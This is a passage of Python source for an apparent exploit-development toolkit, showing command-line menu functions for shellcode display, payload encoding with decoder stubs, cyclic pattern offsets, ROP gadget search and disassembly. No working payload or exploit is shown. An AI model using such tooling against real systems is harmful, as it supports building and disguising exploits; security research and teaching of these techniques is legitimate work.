print(f"{Colors.DIM}{result['description']}{Colors.RESET}")
|
|
print(f"\n{result['shellcode']}")
|
|
|
|
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_encoder(dev):
|
|
"""CLI: Payload encoder."""
|
|
sc_hex = input(f"\n{Colors.WHITE}Shellcode (hex): {Colors.RESET}").strip()
|
|
if not sc_hex:
|
|
return
|
|
encoder = input(f"{Colors.WHITE}Encoder (xor/aes/alphanumeric/polymorphic): {Colors.RESET}").strip() or 'xor'
|
|
key = input(f"{Colors.WHITE}Key (hex/string, or blank for random): {Colors.RESET}").strip() or None
|
|
iters = input(f"{Colors.WHITE}Iterations (default 1): {Colors.RESET}").strip() or '1'
|
|
|
|
result = dev.encode_payload(sc_hex, encoder, key, int(iters))
|
|
if 'error' in result:
|
|
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
|
|
else:
|
|
print(f"\n{Colors.GREEN}[+] Encoded: {result['original_length']} -> {result['encoded_length']} bytes ({result['size_increase']}){Colors.RESET}")
|
|
print(f"Key: {result['key']}")
|
|
print(f"Null-free: {result['null_free']}")
|
|
print(f"\n{Colors.CYAN}Decoder Stub:{Colors.RESET}\n{result['decoder_stub']}")
|
|
print(f"\n{Colors.CYAN}Encoded payload (hex):{Colors.RESET}\n{result['encoded']}")
|
|
|
|
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_pattern_create(dev):
|
|
"""CLI: Pattern create."""
|
|
length = input(f"\n{Colors.WHITE}Pattern length: {Colors.RESET}").strip()
|
|
if not length:
|
|
return
|
|
result = dev.generate_pattern(int(length))
|
|
if 'error' in result:
|
|
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
|
|
else:
|
|
print(f"\n{Colors.GREEN}[+] Pattern ({result['length']} bytes):{Colors.RESET}")
|
|
print(result['pattern'])
|
|
|
|
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_pattern_offset(dev):
|
|
"""CLI: Pattern offset finder."""
|
|
value = input(f"\n{Colors.WHITE}Value to find (hex/int/string): {Colors.RESET}").strip()
|
|
if not value:
|
|
return
|
|
length = input(f"{Colors.WHITE}Pattern length (default 20000): {Colors.RESET}").strip() or '20000'
|
|
result = dev.find_pattern_offset(value, int(length))
|
|
if result.get('offset', -1) >= 0:
|
|
print(f"\n{Colors.GREEN}[+] Found at offset: {result['offset']}{Colors.RESET}")
|
|
print(f" Matched: {result['matched']} ({result['endian']})")
|
|
else:
|
|
print(f"\n{Colors.RED}{result.get('error', 'Not found')}{Colors.RESET}")
|
|
|
|
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_rop_gadgets(dev):
|
|
"""CLI: ROP gadget finder."""
|
|
binary = input(f"\n{Colors.WHITE}Binary path: {Colors.RESET}").strip()
|
|
if not binary:
|
|
return
|
|
gtype = input(f"{Colors.WHITE}Gadget type (all/pop_ret/xchg/mov/syscall/jmp_esp/call_reg): {Colors.RESET}").strip()
|
|
if gtype in ('', 'all'):
|
|
gtype = None
|
|
result = dev.find_rop_gadgets(binary, gtype)
|
|
if 'error' in result:
|
|
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
|
|
else:
|
|
print(f"\n{Colors.GREEN}[+] Found {result['count']} gadgets (via {result['tool']}){Colors.RESET}\n")
|
|
for g in result['gadgets'][:50]:
|
|
print(f" {Colors.CYAN}{g['address']}{Colors.RESET}: {g['gadget']} [{g['type']}]")
|
|
if result['count'] > 50:
|
|
print(f"\n ... and {result['count'] - 50} more")
|
|
|
|
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_disassemble(dev):
|
|
"""CLI: Disassemble hex bytes."""
|
|
hex_data = input(f"\n{Colors.WHITE}Hex bytes: {Colors.RESET}").strip()
|
|
if not hex_data:
|
|
return
|
|
arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64'
|
|
result = dev.disassemble(hex_data, arch)
|
|
if 'error' in result:
|
|
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
|
|
else:
|
|
print(f"\n{Colors.GREEN}[+] {result['count']} instructions (via {result['tool']}){Colors.RESET}\n")
|
|
print(result['listing'])
|
|
|
|
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Singleton
|
|
# ---------------------------------------------------------------------------
|
|
|
|
_instance = None
|
|
|
|
|
|
def get_exploit_dev() -> ExploitDev:
|
|
"""Get singleton ExploitDev instance."""
|
|
global _instance
|
|
if _instance is None:
|
|
_instance = ExploitDev()
|
|
return _instance
|